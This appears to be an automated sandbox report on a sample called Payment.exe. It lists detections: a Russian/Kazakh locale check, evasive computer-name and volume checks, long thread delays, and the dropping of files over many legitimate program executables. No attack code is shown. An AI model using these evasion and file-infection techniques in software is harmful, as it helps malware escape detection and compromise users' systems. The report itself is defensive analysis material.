Source: Yara match	File source: Process Memory Space: jwBqGZseW.exe PID: 7616, type: MEMORYSTR

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Windows\System32\AppVClient.exe	Code function: 14_2_005352A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	14_2_005352A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 19_2_00C052A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	19_2_00C052A0
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Code function: 21_2_00B952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	21_2_00B952A0
Source: C:\Windows\System32\Spectrum.exe	Code function: 27_2_007252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	27_2_007252A0
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Code function: 28_2_007D52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	28_2_007D52A0

Found evasive API chain (may stop execution after checking computer name)

Source: C:\Windows\SysWOW64\perfhost.exe

Evasive API call chain: GetComputerName,DecisionNodes,Sleep

graph_23-6180

Found evasive API chain (may stop execution after checking volume information)

Source: C:\Windows\SysWOW64\perfhost.exe

Evasive API call chain: GetVolumeInformation,DecisionNodes,Sleep

graph_23-6167

Source: C:\Users\user\Desktop\Payment.exe	Memory allocated: 12E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Memory allocated: 2F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Memory allocated: 2C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Memory allocated: 9670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Memory allocated: 8FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Memory allocated: A670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Memory allocated: B670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Memory allocated: 3A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Memory allocated: 3CF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Memory allocated: 3A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Memory allocated: 12C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Memory allocated: 32D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Memory allocated: 16C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Memory allocated: 9470000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Memory allocated: 8DD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Memory allocated: A470000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Memory allocated: B470000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Memory allocated: B870000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Memory allocated: 37C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Memory allocated: 39D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Memory allocated: 37F0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 599812	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 599550	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 599293	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 599185	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 599076	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 598968	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 598858	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 598311	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 597971	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 597849	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 597718	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 597390	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 597280	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 597171	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 597058	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 596951	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 596842	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 596372	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 596252	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 596128	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 595867	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 595701	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 595588	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 595463	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 595308	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 594986	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 594691	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 594453	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 594218	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 594109	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 593997	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 593886	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 593765	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 593655	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 593538	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 593419	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 593297	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 593178	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 593047	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 592923	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 592797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 599843
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 599734
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 599625
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 599516
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 599404
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 599296
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 599076
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 598968
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 598858
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 598649
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 598547
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 598438
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 598320
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 598188
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 598078
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 597963
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 597640
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 597532
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 597422
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 597313
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 597178
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 597047
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 596938
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 596601
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 596373
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 596265
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 596122
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595986
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595875
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595766
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595656
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595542
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595438
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595328
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595219
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595110
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 595000
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 594694
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 594448
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 594342
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 594234
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 594101
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 594000
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 593891
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 593773
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 593672

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5125	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4665	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Window / User API: threadDelayed 4991	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Window / User API: threadDelayed 4034	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Window / User API: threadDelayed 483
Source: C:\Windows\SysWOW64\perfhost.exe	Window / User API: threadDelayed 7281
Source: C:\Windows\SysWOW64\perfhost.exe	Window / User API: threadDelayed 2716
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Window / User API: threadDelayed 4460
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Window / User API: threadDelayed 5221

Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\sppsvc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
